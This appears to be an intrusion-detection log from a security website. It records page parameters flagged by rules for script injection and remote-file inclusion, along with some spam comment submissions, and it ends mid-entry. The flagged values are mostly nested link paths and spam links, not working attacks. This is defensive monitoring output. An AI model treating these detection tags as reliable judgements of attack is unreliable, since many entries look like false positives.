Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121623
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121624
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121625
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121626
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121627
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121628
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121629
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121630
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121631
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121632
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121633
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121634
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121635
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121636
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121637
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121638
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121639
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121640
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121641
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121642
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121643
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121644
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121645
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121646
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121647
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121648
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121599
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121600
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121601
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121602
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121603
Name:REQUEST.page
Value:security/security/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121604
Name:REQUEST.page
Value:security/security/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121605
Name:GET.page
Value:security/security/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121606
Name:GET.page
Value:security/security/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121607
Name:REQUEST.page
Value:security/security/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121608
Name:GET.page
Value:security/security/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121609
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121610
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121611
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121612
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121613
Name:REQUEST.page
Value:security/security/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121614
Name:GET.page
Value:security/security/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121615
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121616
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121617
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121618
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121619
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121620
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121621
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121622
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:18
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121591
Name:REQUEST.page
Value:security/security/i.php?page=security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121592
Name:REQUEST.page
Value:security/security/i.php?page=security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121593
Name:REQUEST.page
Value:security/security/i.php?page=security/security/i.php
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121594
Name:GET.page
Value:security/security/i.php?page=security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121595
Name:GET.page
Value:security/security/i.php?page=security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121596
Name:GET.page
Value:security/security/i.php?page=security/security/i.php
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121597
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121598
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:17
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121589
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://rayjsextape.posterous.com/#1 >ray j sex tape</a> [url=http://rayjsextape.posterous.com/#1]ray j sex tape[/url], 015978,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 22:58:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121590
Name:POST.codeme
Value:can you do thi for me, <a href= http://rayjsextape.posterous.com/#1 >ray j sex tape</a> [url=http://rayjsextape.posterous.com/#1]ray j sex tape[/url], 015978,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 22:58:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121587
Name:REQUEST.codeme
Value:Hi, <a href= http://freemusicalecards.yolasite.com#1 >free musical ecards</a> [url=http://freemusicalecards.yolasite.com#1]free musical ecards[/url], :-OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 22:35:11
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121588
Name:POST.codeme
Value:Hi, <a href= http://freemusicalecards.yolasite.com#1 >free musical ecards</a> [url=http://freemusicalecards.yolasite.com#1]free musical ecards[/url], :-OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 22:35:11
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121575
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121576
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121577
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121578
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121579
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121580
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121581
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121582
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121583
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121584
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121585
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121586
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121557
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121558
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121559
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121560
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:12
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121561
Name:REQUEST.page
